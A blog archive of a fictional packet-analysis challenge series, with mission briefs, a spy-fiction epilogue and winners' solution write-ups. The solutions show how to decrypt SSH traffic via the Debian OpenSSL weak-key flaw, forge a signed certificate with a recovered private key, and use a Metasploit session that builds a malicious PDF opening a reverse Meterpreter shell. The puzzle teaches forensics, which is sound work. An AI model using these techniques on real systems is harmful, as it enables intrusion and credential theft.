Archive for the Spy Hunter Category

The Spy Hunter, Part III – Solution

Posted in Packet Challenge, Spy Hunter on 14 February, 2012 by Alec Waters

Part III was a different kind of challenge. For the first time, players were on the offensive, acting as Agents rather than reacting as Investigators. Out of over 220 downloads of the mission brief, only a single Yellow Sun agent managed to complete the challenge – hats off to Marcelo Mandolesi, Agent Of The Month! Marcelo’s excellent writeup is below, but first, a quick word from me:


Sponsor Alec! I hope you have fun with these challenges; I certainly have fun creating them! I’m running the 2012 Brighton Half Marathon on Sunday 19th of February in aid of Help for Heroes – please sponsor me if you can by clicking the link to the right:

Now, over to Marcelo:

Discover how to access the GMTA website

Open up the OperationCHASTISE.pcap file with Wireshark and follow the TCP stream of the IRC packets. There we find the following URL.


This leads to: https://gmta.nybblecomms.42 which means we need to add the .42 top-level domain DNS servers to be able to browse to it. The DNS servers can easily be found here: http://wiki.42registry.org/page/Resolve. Run a nslookup gmta.nybblecomms.42 and we see that the IP address is 2001:6f8:608:7:221:5aff:feab:5144.


My ISP is not IPv6 friendly so that left me with making a Teredo tunnel. After some configuration I verified that I was able to browse IPv6 websites and could access the NybbleComms website. This shows the Teredo tunnel successfully working.


The trick was to change the type from “client” to “enterpriseclient” and adding a static route for all ipv6 traffic to use the Teredo interface with the following respective commands:

netsh interface Teredo set state enterpriseclient
netsh interface ipv6 add rouate ::/0 interface=10

(the interface number is listed at the beginning of the route print command’s output)

Take a look at the bottom of the website and we find that the GMTA’s public key is available for download here: https://gmta.nybblecomms.42/GMTA-CA.pem.

Discover the date and time of NybbleComms’ next test missile firing

Going back to the IRC conversation, we find that the time and dates of the missile firings are publicly known. Their support is kind enough to give us the notice.
The notice is written in the “Notices to Airmen” format. After some patient Googling, you can translate the message to say:

  • QWMLW = missile, gun or rocket firing will take place
  • Within a 40 nautical mile radius of the coordinates 52.132237 North 0.973028 East
  • EGUW = Wattisham Airfield (a military airport in Wattisham UK)
  • On February 18th 2012 from 10:00 AM to 10:30 AM UTC/GMT. This means that the launch time is at 10:00AM but the notice announcement lasts until 10:30.

Recover enough cryptographic material to allow the signing of a fake, but valid, MTP

Time to take a look at another TCP stream in the pcap file. Starting at packet number 220, we see some encrypted SSH traffic. I wonder what’s happening in IRC right when this starts. Go to packet number 217 and we find the dev support guy saying “Let me transfer that private key for you”.


It seems that this is our chance to get a copy of the GMTA’s private key which will allow us to sign the public key retrieved from the website. The dialog in IRC tells us that the dev support guy keeps a copy of the private key on his Ubuntu Gutsy and gives us a clue that this is very vulnerable. Doing some searches for SSH vulnerabilities around 2007-2008 leads us to this: http://www.debian.org/security/2008/dsa-1571 which states:

Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

Doing some more searches leads us to these set of tools: https://www.cr0.org/progs/sshfun/ designed to take advantage of this vulnerability. First you have to export only the SSH packets from Wireshark and use the tool tcpick to split the traffic into server and client streams. Running the ssh_decoder.rb file on these two files lets us see the normally encrypted SSH traffic.

The data that is relevant for us is stored in the sshdecrypt.1.client.dat file because the client transferred the key to the server. Note that the Ruby script required the –c switch which means that the client is vulnerable, not the server. By running strings on the .dat file we have the private key as well as his username and password.

Discover the location of the BATCAVE

The briefing document gives a clue that the re-examining the social media profiles of SIBHOD operatives may be useful. It appears that Ultra Venona has tweeted this link: http://j.mp/xzxmfW which leads to a SQL 2008 Express database. Take a look inside and we find a database called placesDB with the following information.


The location of the BATCAVE is stored in this database in SQL’s geography data type. We can use the STAsText method to convert the binary data to readable form.

The coordinates of the BATCAVE are 52.106428 North 1.58205 East. It appears to be an underground bunker on the East coast of England. Notice that this bears resemblance to the SIBHOD logo.


Assembling the MTP certificate

First we have to setup our openssl environment. Note I will skip a lot of the detail in configuring the openssl configuration file. Copy an existing openssl.cnf from the web and edit it to use the GMTA’s public and private keys.

Certificate = GMTA-CA.pem
private_key = GMTA-CA.key.pem

Configure the NotBefore and NotAfter times of the certificate by adding the following two lines to the [ CA_default ] section of openssl.cnf. Since the launch is at 10:00 AM I chose 09:56AM and 10:04AM as my start and end dates.

default_startdate = 120218095600Z
default_enddate = 120218100400Z

Add the following information to the [ req_distinguished_name ] section of openssl.cnf. The OU field should equal “WARHEAD-FAE” because thermobaric explosives are effective against underground bunkers. The CN field should equal “52.106428×1.58205” for the coordinates of the BATCAVE. The rest of the fields do not matter but I made them match the GMTA’s public key.

[ req_distinguished_name ]
0.organizationName = NybbleComms
organizationalUnitName = WARHEAD-FAE
localityName = Guildford
stateOrProvinceName = Surrey
countryName = GB
commonName = 52.106428×1.58205

The following section will configure the X509v3 extensions which will make the Authority Key Identifier equal the GMTA’s cert.

[ usr_cert ]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid,issuer

Run this command to create a certificate request:

openssl req -new -nodes -out req.pem -config openssl.cnf

Run this command to create the certificate and sign it:

openssl ca -out MTP.pem -config openssl.cnf -infiles req.pem

Convert the pem file to der format:

openssl x509 -in MTP.pem -outform der -out MTP.der

View the contents of the certificate:

openssl x509 –in MTP.der –inform –text -noout

The Authority Key Identifier matches and all the other required fields look good too.

Upload the MTP to the Guided Missile Targeting Authority

The GMTA website requires a Userid and Password field as well as the MTP certificate.

Packet number 395 in the pcap file contains MySQL traffic with a username and password of “launchmaster” and “one2ThreeBOOM”.


Supply the certificate and these credentials and we verify that it has accepted our forged certificate.



Nice shot, Marcelo! The question now is, will NybbleComms notice the unauthorised MTP in time to revoke it? Or will Yellow Sun finally be rid of their two greatest threats? Stay tuned for Part IV!

Bootnotes

The abbreviation-laden NOTAM retrieved from the IRC chat reveals the location of NybbleComm’s launch site, correctly identified by Marcelo as RAF Wattisham. Taking a closer look at the site reveals the missile sitting on its pad:

The layout of the pads is that of a Bloodhound surface-to-air missile installation; you can read all about this specific one here.

As for the location of the BATCAVE, it’s actually the site of an experimental over the horizon radar system codenamed Cobra Mist; the BATCAVE itself is at the focal point of the antenna array. The radar itself was a failure, despite a nine-figure price tag.

Finally, the real Operation CHASTISE was this one, which I imagine a lot of people are familiar with.

Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Spy Hunter, Part III

Posted in Packet Challenge, Spy Hunter on 24 January, 2012 by Alec Waters

From the mission brief:

Operation CHASTISE – Strategic Aims
Subvert NybbleComms’ next missile test, replacing the inert test warhead with a live one and targeting the BATCAVE. The net effect will be the physical destruction of SIBHOD, and the discrediting of arch-rival NybbleComms as a business competitor for allowing a test firing to go so badly wrong… 

Yellow Sun Heavy Industries have been playing catchup ever since Donald Burgess was recruited by the Sinister Icy Black Hand Of Death. Now, at last, a chance has arisen to strike decisively and put an end to Yellow Sun’s two biggest threats. Do you have the skills to carry out the mission successfully? Click here to find out!

PS…

Sponsor Alec! I hope you have fun with these challenges; I certainly have fun creating them. If you were wondering how you could possibly say “thankyou”, I’m running the 2012 Brighton Half Marathon in aid of Help for Heroes – please sponsor me if you can by clicking the link to the right:


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Using Maltego CaseFile to map The Spy Hunter

Posted in Spy Hunter on 2 December, 2011 by Alec Waters

In any investigation, keeping track of evidence is crucial to success. When it comes to crime scene photos, bios of suspects, pictures of exhibits, etc, you might like to follow the lead of TV cops and pin it all to a board in the squad room:

Doctor Reid and his gigantic sliding tile puzzle

Or you might like to use one of those new-fangled computer thingies instead. Paterva (of Maltego fame) have recently released a beta of their latest effort, CaseFile:

CaseFile is aimed at analysts that do not necessarily use open sources of intelligence (or even the Internet for that matter). Think of it as Maltego without transforms but with tons of new features. Adding/attaching photos, documents and annotations to nodes, graph merging, better integration with browsers, passwords on graphs, and tons of new useful entities – and this is just a few of the goodies we’ve added into CaseFile.

I thought I’d test it out by creating a graph of the players in my Spy Hunter packet challenges (Part One, Part Two). Here’s what I came up with:

The graph above shows SIBHOD on the right, and the target organisations on the left. SIBHOD’s infiltrations are either via its own agents (e.g. Kerry Nitpick using the alias Arnold Davies placed directly within NybbleComms) or via subverting employees (e.g. Donald Burgess). SIBHOD’s organisational structure is shown via the “Reports to” links; also shown are aliases and social network identities. The people are of different types – Dave Nice is a Gang Leader, Kerry Nitpick is a Gang Member, Donald Burgess is an Employee, etc.

Each element on the graph can have lots of information attached. For example, double clicking on the Silky Suzy “Alias” icon shows you this:

You can attach as many arbitrary files and notes as you like. I did try putting notes on the links (to document what an agent’s mission is, for example), but these don’t seem to get saved properly (bug in the beta?). Links to external sites are possible, too – double click Homer Hicks’ Twitter affiliation, and click “Open all URLs” in the top right to be taken directly to his Twitter feed:

It’s extremely cool. Download CaseFile from here (watch the video too), and the Spy Hunter graph from here, then have a play around!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Spy Hunter, Part II – Solution

Posted in Packet Challenge, Spy Hunter on 14 August, 2011 by Alec Waters

The Spy Hunter, Part II is here. There’s an epilogue to the story here which will make more sense once you’ve read this post!

As with last time, we had a good number of entries to the challenge. It was a very close call, but the winner this time is Jeff Gibat! Well done Jeff; honorable mentions also go to Sairon Istyar, Marcelo Mandolesi and John Douglas.

Before going over Jeff’s answers, I’ll first go over the process needed to dissect the supplied pcap. My aim for the challenge was to require quite a diverse skillset in order to root out all the answers, including:

  • pcap analysis
  • IE cache forensics
  • Malware reverse engineering
  • Audio steganography
  • Relational database analysis

Opening the pcap in Wireshark and nosing around a little, we can see that we’re dealing with a stream of TFTP traffic between two hosts, 192.168.93.3 and 192.168.88.56:

If we apply a display filter of “tftp.opcode == 2″ (“Write Request”), we can see that three files have been transferred, namely:

  • ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav
  • SHOPPINGLIST.7z
  • IECache.7z

The trick now is to extract these three from the capture. Wireshark doesn’t seem to be great at this, but there are several other tools which are including NetworkMiner, Xplico and TFTPgrab. Extra points to John Douglas who went above and beyond the call of duty and wrote his own parser to carve the three files out.

Loading the capture into NetworkMiner shows the three files it has extracted on the “Files” tab. Note that the wav file has had its filename truncated to twenty characters, which is a shame because the filename is a clue!

NetworkMiner will conveniently save these files for you in subdirectories under the AssembledFiles directory. Let’s examine the three in turn:

  • ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav
    This is a well formed wav file, but when you play it it’s not exactly tuneful.
  • SHOPPINGLIST.7z
    This is a well formed 7z archive, but it’s password protected.
  • IECache.7z
    Again, this one is a well formed 7z archive, but there’s no password protection here.

The third file is the low-hanging fruit at this point, so we’ll tackle it first. As hinted by the filename, it does indeed contain an IE Cache directory (mercifully quite a small one!). There are any number of tools for performing cache forensics; IECacheView is one of them. By clicking Select Cache Folder from the File menu and specifying the directory where you unzipped the .7z file we can take a look:

The cache directory shows someone logging into a webmail interface at mail.email4espionage.spy. Two messages are read, the first of which looks like this:

Return-Path: dave.nice@email4espionage.spy
Received: from email4espionage.spy ([127.0.0.1])
by mail.email4espionage.spy
; Fri, 8 Jul 2011 21:41:20 +0100
MIME-Version: 1.0
X-Mailer: MailBee.NET 6.0.2.220
X-Priority: 3 (Normal)
From: "Dave Nice" <dave.nice@email4espionage.spy>
To: roberto.tablato@email4espionage.spy,
kerry.nitpick@email4espionage.spy,
guatrau@email4espionage.spy,
steve.austen@email4espionage.spy,
pete.michaels@roseandcrown.pub
Cc: dave.nice@email4espionage.spy
Subject: Re: SIBHOD and friends team day out
Date: Fri, 08 Jul 2011 21:41:20 +0100
X-Originating-IP: 127.0.0.1
Message-ID: <2.6b59ee93be36ce1bad15@SIBHOD-1>
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Hi all,
The final list of attendees will be:
* Myself
* Bobby (NOT Suzy!)
* Kerry
* Pete
* Garry
Steve's not coming of course, and the Guatrau says he'll meet us at the BATCAVE for beers afterwards.

Venue:
HAPPYLAND; meet on Saturday 16th at BLACK TWO at 1430. Garry's got us great seats for Kung Fu Panda 2! He also says that a COWABUNGA is in effect at SODIUM - let's eat first, and we can watch the film with plunder in hands!

The boring bit:
Following standard SIBHOD procedure, I am issuing a tentative UTOPIA to everyone for the duration of the outing. Please act like it - do not group up before reaching BLACK TWO. Sit in groups of no more than two at SODIUM.

The fun bit:
Come in fancy dress as one of the Furious Five. There will be a prize for the best outfit. I call Po!

See you next Saturday,
Dave

OK, sounds like a fun day out, and we’ve got some names, places and cryptic codewords to chew over as we go on.

The next email looks like notification of a Twitter DM:

This looks like the phishing message sent by Yellow Sun from @HomerHicks to @UltraVenona, bearing the recognition code “scelidosaurus” provided by Donald Burgess and the link provided by Keith Starr. The person whose IE cache we’re going through could therefore be @UltraVenona himself!

The  IE cache also shows that the link above was indeed clicked as Yellow Sun hoped it might be, and a file called TNM-Defect-943024.pdf was downloaded – this is the exploit supplied by Starr to compromise @UltraVenona’s machine. By analysing this file, we can determine what Starr’s intent was, but the short answer is that it’s a standard MetaSploit exploit:

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 721 exploits - 367 auxiliary - 74 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13543 updated today (2011.08.12)

msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.93.2
LHOST => 192.168.93.2
msf exploit(adobe_cooltype_sing) > set LPORT 4444
LPORT => 4444
msf exploit(adobe_cooltype_sing) > set FILENAME
TNM-Defect-943024.pdf
FILENAME => TNM-Defect-943024.pdf
msf exploit(adobe_cooltype_sing) > exploit

[*] Creating 'TNM-Defect-943024.pdf' file...
[*] Generated output file /home/user/.msf4/data/exploits/TNM-Defect-943024.pdf

When @UltraVenona opened this file with his vulnerable PDF reader, Keith Starr got a Meterpreter shell on @UltraVenona’s machine. The Yellow Sun strikeback is looking pretty good at this point!

Having dug about as deeply as possible into the IE cache it’s time to turn our attention to the other two files, the tuneless wav and the password protected SHOPPINGLIST.7z. Having to brute-force the password for the 7z isn’t really in the spirit of a packet challenge, so perhaps the password is present in the evidence somewhere. Let’s see where analysing the wav file gets us.

As I mentioned, there’s a clue in the filename of the wav file, which is present in full in the pcap – ARTIST_-_Spectrogram_-_TRACK_-_Secrets.wav. I’m sure that Spectrogram are indeed the Greatest Band The World Has Ever Known, but a spectrogram is also a visualisation of an audio signal. Several tools are available to render spectrograms of audio files, such as Spectrogram 5 which you can download here. Run it up, select Analyze File from the File menu, and load up our wav file. You’ll be treated to the view below:

Our little visualisation has revealed some text! Perhaps “IamJamesBond” is the passphrase to SHOPPINGLIST.7z? We’ll find that out in a minute – for now, here’s a quick explanation of how I created the wav.

First, I created a white on black image file containing the phrase IamJamesBond. Then I loaded it into Coagula with Open Image from the file menu:

Now select “Render without blue” from the Sound menu, and finally “Save Sound As” from the File menu. Load the resulting wav file into Spectrogram to see the goodness.

Right, back to the plot. Does IamJamesBond open up SHOPPINGLIST.7z? Why yes, it does! There’s only one file in the archive, called SHOPPINGLIST.db. Sounds like a database file, but what type?

morpheus:~# file SHOPPINGLIST.db
SHOPPINGLIST.db: SQLite 3.x database

There are many tools available for analysing SQLite databases, and SQLite Maestro is a very nice one. The first thing we need to do with any unknown database is determine its structure, in terms of tables, columns and foreign key relationships. SQLite Maestro makes this quite straightforward – select Designer from the Tools menu, then hit “Reverse Engineering” under General. You will be rewarded with a schema diagram a little like this:

I tried to make the database as meaningful and realistic as possible in terms of structure and foreign key naming conventions. There are straightforward one-to-many joins, like the one between the Person and the Photo table, which represent relationships like “one person may have many photos”. There are also self-referential foreign keys which reference the same table rather than another one, e.g. Person.Reports_To is a foreign key onto Person.ID – this represents the organisation’s hierarchy. The AgentPlacement and Employment tables facilitate many-to-many joins, representing, for example, the fact that a single agent can be placed in many organisations and also that a single organisation may have many agents in it. Have a nose around, especially in the Codewords table, and hopefully things will all make sense (including why the database itself is called SHOPPINGLIST!).

The bulk of the mission objectives can be fulfilled with careful analysis of the database, so without further ado we’ll move on to Jeff’s answer. Where Jeff has expanded out a codeword I will supply the original, and I will also give appropriate SQL statements to back up Jeff’s answers. I’ll use italics to differentiate.

Over to Jeff:

Determine how Starr took over UltraVenona’s computer. What exploit and delivery mechanism did he use?

  • Delivery mechanism: PDF
  • Exploit: javascript heap overflow in PDF. More info to come. I used Didier Steven’s pdfid and pdf-parser to extract the javascript. The Javascript which is called when the document is opened creates a large array in memory of what probably contains nop sleds and shellcode repeated. There was no exec() or other function call from the javascript so my initial hunch is that by allocating such a large amount of memory, it crashes the reader application and control finds its way to the shellcode.

Determine the name of the Adversary organisation. Are they a foreign intelligence service, or some other kind of organisation?

The Sinister Icy Black Hand of Death (greatest covert intelligence agency the world has ever seen) (Look in the Organisation table)

Determine if Yellow Sun is the Adversary’s only target, or if there are others

Other target: NybbleComms (Look in the Organisation table)

Determine the names and aliases of the agents employed by the Adversary, plus the Adversary’s organisational hierarchy

Name Alias_Name Notes
Dave Nice Ultra Venona Assigned by SIBHOD
Donald Burgess Homer Hicks Assigned by SIBHOD
Kerry Nitpick Arnold Davies Assigned by SIBHOD
Kerry Nitpick Keith Starr Known alias, used for non-SIBHOD business
Kerry Nitpick Rock Studman Self-defined nickname used in futile attempts to impress the ladies
Kerry Nitpick Scorpion Assigned by SIBHOD
Pete Michaels Argus Assigned by SIBHOD
Pete Michaels Pubmeister Nickname used by acquaintances and customers
Real name unknown The Guatrau Assigned by SIBHOD
Roberto Tablato Little Bobby Tables Assigned by SIBHOD
Roberto Tablato Silky Suzy Assigned by SIBHOD; only uses this alias on Friday nights at The Pink Oyster Social Club (MARKET)
Steve Austen Kim Philby Assigned by SIBHOD
Steve Austen Stanley Assigned by SIBHOD
Susan Jones Barbie Assigned by SIBHOD

SELECT
Person.Name, Alias.Alias_Name, Alias.Notes
FROM
Person
INNER JOIN Alias ON (Person.ID = Alias.Person_FK)
ORDER BY
Person.Name

Organizational Hierarchy:

Susan Jones reports to Pete Michaels
Pete Michaels, Donald Burgess, Kerry Nitpick, and Roberto Tablato report to Dave Nice
Dave Nice and Steve Austen report to The Boss (Name unknown).

SELECT
Person.Name as 'Person',
Boss.Name as 'Boss'
FROM
Person Boss
INNER JOIN Person ON (Person.Reports_To = Boss.ID)
ORDER BY
Boss.Name

Determine where these people have “day jobs”

Name Organization Name Job description
Dave Nice The Sinister Icy Black Hand of Death Agent handler. The best looking, most skilled operative on SIBHOD’s payroll haha
Donald Burgess Yellow Sun Heavy Industries Employed as a low-level tech support worker. Hasn’t been promoted in over ten years. Easily manipulated
Garry Francis MacDoddy’s Flips burgers
Garry Francis The Picture House Mans the popcorn booth
Kerry Nitpick The Sinister Icy Black Hand of Death Technical support (client side exploits)
Pete Michaels The Rose and Crown Pub Bartender
Real name unknown The Sinister Icy Black Hand of Death The Boss. Do what he says.
Roberto Tablato The Sinister Icy Black Hand of Death Technical support (web appsec)
Steve Austen The Sinister Icy Black Hand of Death Recruiter. Keeps his distance in order to remain covert long-term. Aside from New Potential Recruits (GREENHILLS), only The Guatrau has ever met him in person; possibly schoolfriends?
Susan Jones Yellow Sun Heavy Industries HR secretary dating Pete Michaels. Loves to gossip about co-workers. Abuses her position in HR to feed her addiction to gossip. Unwittingly supplies Michaels with useful information

SELECT
Person.Name,
Organisation.Name,
Employment."Job description"
FROM
Person
INNER JOIN Employment ON (Person.ID = Employment.Person_FK)
INNER JOIN Organisation ON (Employment.Organisation_Fk = Organisation.ID)
ORDER BY
Person.Name

Determine details of their cover placements in target organisations, their mission objectives, and which aliases are used for each placement

Name Alias_Name Organization Name Mission objectives
Kerry Nitpick Arnold Davies NybbleComms Embed backdoors into the guidance software of tactical cruise missiles from NybbleComms (CANDYSTORE). Once we have the ability to control an arbitrary missile in flight, the Guatrau wants a flashy joystick to go on his desk to fly them with
Roberto Tablato Silky Suzy The Pink Oyster Social Club Work Friday nights as a hostess – uses this position to get “close” to patrons for intel gathering and blackmail purposes. Just don’t ask how close he gets….
Pete Michaels Argus The Rose and Crown Pub Overhear the conversations of intoxicated Yellow Sun (GOLDMINE) employees. Use this together with intel from Barbie to supply New Potential Recruits (GREENHILLS) to Stanley
Donald Burgess Homer Hicks Yellow Sun Heavy Industries Obtain the plans to Project ThatsNoMoon from Yellow Sun (GOLDMINE). Short-term throwaway asset. Has extremely limited tradecraft, and is likely to be a liability once used – cut all ties immediately he delivers useful assets
Susan Jones Barbie Yellow Sun Heavy Industries Long-term asset. Has no idea she’s being used by Argus to supply information on Yellow Sun (GOLDMINE) employees.

SELECT
Person.Name,
Alias.Alias_Name,
Organisation.Name,
AgentPlacement."Mission objectives"
FROM
AgentPlacement
INNER JOIN Organisation ON (AgentPlacement.Organisation_Fk = Organisation.ID)
INNER JOIN Alias ON (AgentPlacement.Alias_FK = Alias.ID)
INNER JOIN Person ON (Alias.Person_FK = Person.ID)

If possible, determine what the agents look like

Donald Burgess

Donald Burgess

Roberto Tablato

Roberto Tablato

Roberto Tablato as Silky Suzy

Roberto Tablato as Silky Suzy

Dave Nice

Dave Nice

Pete Michaels

Pete Michaels

Kerry Nitpick

Kerry Nitpick

Susan Jones

Susan Jones

Garry Francis

Garry Francis

(Get this lot out of the photo table)

If possible, speculate on the means by which Burgess was identified and recruited, and the existence of Project ThatsNoMoon leaked

Burgess AKA Homer Hicks was probably identified and recruited while drinking at the Rose and Crown Club

If any arrests are to be made, when and where might be best to round up as many members of the Adversary at once?

SIBHOD and friends team day out!

The Picture House Cinema on the High Street (HAPPYLAND), Saturday the 16th Popcorn Stall (BLACK TWO) at 2:30. Mac Doddy’s (SODIUM) is giving away Kung Fu Panda toys in their happy meals (COWABUNGA), so they will eat there first.

Everyone will be suspected compromised for the duration of the outing (UTOPIA). They will not group up before reaching the popcorn stall.  Won’t sit in groups of more than 2 at MacDoddy’s.

Attendance should be: Dave, Bobby, Kerry,Pete, and Garry

Speculate on the reason for Starr’s sudden exit and subsequent disappearance

Starr (Kerry Nitpick) became tense and agitated and exited because once he started inspecting the data he realized that his employer, SIBHOD, was the adversary, and the person he just hacked, ULTRAVENONA, is actually his boss, Dave Nice!


Great work, Jeff! Despite Yellow Sun’s total vetting failure in employing Keith Starr aka Kerry Nitpick, they have totally unpicked SIBHOD’s operations. The only question now is what they will choose to do with this information – stay tuned for Part III!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Spy Hunter, Part II – Epilogue

Posted in Packet Challenge, Spy Hunter on 10 August, 2011 by Alec Waters

Kerry Nitpick wanted to run. But to do so would be to draw attention to himself, to “show out” as the pavement artists call it. He did not know if the surveillance team following him was real or merely in his imagination, but either way he was certain they were there.

They’d probably been on him since he left Yellow Sun HQ thirty minutes ago. YS hadn’t trusted him from day one – they’d likely been watching him ever since. The team was probably plotted up away from the building; no need to have their own eyes-on in such a controlled environment. That goon in the security hut at the gate must have been the trigger.

An aware target masquerading as an unaware one, Kerry strained his hearing, trying to hear them on their radios.

RED has the eyeball
GREEN backing
BLUE, I’m on the other side of the street

Despite the odds, the advantage was still his. He knew that as he turned left onto Laker Street they’d do their silly little dance, same as always, regular as clockwork.

RED, Target is approaching nearside turn onto Laker Street
BLUE moving up to cover

He’d be able to see Blue now if he looked over his right shoulder. He considered taking an extra step or two before turning the corner just to rattle them, but that would have tipped them off that he knew they were there. “Never let them know that you know,” Dave always used to say, “That’s Rule #1.” Rule #1 changed with the wind, but this one had held the title at least once.

He turned left onto Laker Street.

RED that’s the target Left Left onto Laker Street; handover
BLUE has the eyeball. Target proceeding, corner is clear
GREEN turning Left Left; I have the eyeball
BLUE backing
RED, I’m on the other side of the street

Laker Street was routinely pounded by suburban traffic, rattling the sash windows of the tall Victorian homes on the left hand side. Most properties had basements with steps leading down from the street; RED ONE was one such basement flat, number 221b. As he passed it he looked as closely as he could without turning his head. Everything seemed in order, but he certainly wasn’t going in through the front door. RED ONE was chosen for a very good reason, one which the surveillance team was soon to discover to their cost.

Leaving the steps to RED ONE behind, he maintained his pace but quickened his thoughts. The next left turn onto Kingsway had to be just right – he’d have three or four seconds tops to evade his pursuers. The window was tight, but terrain was on his side.

GREEN, Target is approaching nearside turn onto Kingsway
RED There’s no more footpath – I can’t move up to cover the corner! There’s too much traffic for me to step into the road
GREEN, That’s understood. If the Target takes the nearside turn I’ll clear the corner myself and we’ll carry out cornering drill without you. Catch up when you can
RED, That’s received

With Red neutered by the short footpath, Kerry turned left onto Kingsway, passing the corner shop. As he did so he removed his jacket and increased his walk almost to a jog.

GREEN that’s the Target Left Left onto Kingsway. Temporarily unsighted

Out of sight of the surveillance team, Kerry turned left one last time into the alleyway alongside the corner shop. Running now, he made for the rubbish bin that stood in front of the six foot gate that blocked further passage and obscured the alley’s access to the rear of the properties on Laker Street.

GREEN, I’m crossing Kingsway. No sign of Target. Loss, Loss

Lent by adrenaline the agility of a fitter man, he leapt onto the bin and threw his jacket over the thin strand of barbed wire that topped the gate. He hauled himself over and down the other side, tugging the shredded remains of his jacket behind him.

BLUE turning Left Left onto Kingsway. No sign of Target. Loss, Loss

Moving down the alleyway to the rear entrance of number 221b, the surveillance team’s comms chatter faded to silence.

GREEN, Total Loss, Total Loss. Commence search pattern

Finally inside RED ONE, Kerry took stock. It was supposed to be a straightforward penetration job; a simple exploit, lift some assets, get out. It would have been so much better had the target not turned out to be his boss, his real boss. All this “need to know” nonsense just gets a man into trouble. Why hadn’t Dave told him SIBHOD had already penetrated Yellow Sun? Why wouldn’t Yellow Sun tell him who the target was? Keith Starr would never have taken the job if he’d known.

So he did the best he could. He wasn’t going to give Yellow Sun anything that would damage SIBHOD; instead he turned over part of Dave’s tasteless music collection, plus his shopping list and his IE cache. Total junk, but better than nothing. It certainly bought him a ticket out of Yellow Sun’s front door.

But what to do next? From the files he turned over to Yellow Sun, he was certain there was nothing that could link him to either Dave or SIBHOD. Keith Starr’s professional reputation would take a bit of a hit, but if he kept his mouth shut, no harm done, surely? Or perhaps he should come clean to Dave, at least to tell him to update his PDF reader. Or maybe silence is golden – SIBHOD is not an organisation that tolerates failure…

A full write up of the winning solution to the Spy Hunter Part II Packet challenge is here!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Spy Hunter, Part II

Posted in Packet Challenge, Spy Hunter on 13 July, 2011 by Alec Waters

Donald Burgess, aka HomerHicksIn the wake of the Donald Burgess affair, Yellow Sun Heavy Industries finds itself in an uncomfortable situation. The top secret plans for Project ThatsNoMoon are in the hands of an unknown Adversary, and the traitorous Burgess has disappeared.

Only by taking positive action of its own can Yellow Sun hope to salvage the situation…

Evidence has been collected as the result of offensive action on the part of Yellow Sun against their unknown Adversary. Are you up to the challenge of maximising the haul’s intelligence yield? Click here to find out!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Spy Hunter – solution

Posted in Packet Challenge, Spy Hunter on 13 September, 2010 by Alec Waters

We had a number of great entries to the challenge; it was very interesting to see how people approached it! I had fun creating it, and I hope you had fun investigating – thanks very much to everyone who played!

It was a close call, but I am pleased to announce that the winner of the “Ace Investigator” award and $25 gift card is Travis Lee (@eelsivart on Twitter). Other great entries came from Ben Downton, the Penn State IA club, and Silas Cutler.

Here are the mission objectives as submitted by Travis:

Link between Donald Burgess and the alias HomerHicks

Donald Burgess has a Facebook page and is friends with Kim Philby. They have both written on each other’s walls.  The image that Donald Burgess uses on Facebook is the same image that HomerHicks uses on Twitter.  A web search for “Donald Burgess” leads to a Wikipedia page on the “Cambridge Five”. There were two people in that group that in which one was named Donald Duart Maclean and had the crptonym “Homer” and one was named Guy Burgess that had the cryptonym Hicks.  Donald Burgess is a name comprised of both of those individuals so the cryptonyms would also be combined to form “HomerHicks”.

Names and/or aliases of HomerHicks’ associates

Name: ?
Alias: UltraVenona

Name: Kim Philby
Alias: Stanley

Name: Robert’); DROP TABLE Students;–
Alias: Little Bobby Tables

How was HomerHicks recruited and by whom

HomerHicks (Donald Burgess) was recruited by Kim Philby.  They first met at FIA 2010, day three near the Thales exhibit.  They then exchanged messages on Facebook where Kim put Donald in touch with UltraVenona to talk about some “extra part time work”.

Timeline of events

All times are in PST.  Timestamp from IRC conversation was converted from BST to PST.
Aug 16, 3:49am – Donald Burgess joins Facebook and posts “Hello Facebook!” on his wall.
Aug 16, 4:17am to 4:36am – Kim Philby makes contact with Donald Burgess on Facebook by writing on his wall.  Kim asks Donald if he would like to do some extra part time work and puts him in touch with a friend, UltraVenona.
Aug 16, 1:37pm – UltraVenona makes a tweet to @HomerHicks saying “good to meet today”. UltraVenona also gives HomerHicks additional instructions.
Aug 17, 9:17am – HomerHicks has stolen Alpha from an old backup tape and has given it to UltraVenona.
Aug 17, 9:19am – HomerHicks discovers that Bravo is also on the same tape and steals Bravo.
Aug 17, 9:20am – UltraVenona tells HomerHicks on Twitter to contact @LittleBobbyTbls for help.
Aug 17, 9:24am – HomerHicks makes contact with @LittleBobbyTbls on Twitter for help getting Charlie.
Between Aug 17, 9:41am and Aug 18, 10:13am – HomerHicks has stolen Charlie.
Aug 18, 10:13am – HomerHicks logs into IRC and has a conversation with UltraVenona.  HomerHicks gives up Bravo to UltraVenona.
Aug 18, 10:49am – UltraVenona validates Bravo against Alpha.
Aug 18, 10:54am – HomerHicks is paid and gives up Charlie to UltraVenona.
Aug 18, 10:57am – HomerHicks is extracted from the coffee shop.

Who gave Donald Burgess assistance and what kind?

Little Bobby Tables gave Donald Burgess assistance.  He showed Donald how to use SQL injection and tshark to get a packet capture of SMTP traffic which is what Charlie was.

Recovery of Assets

Alpha:
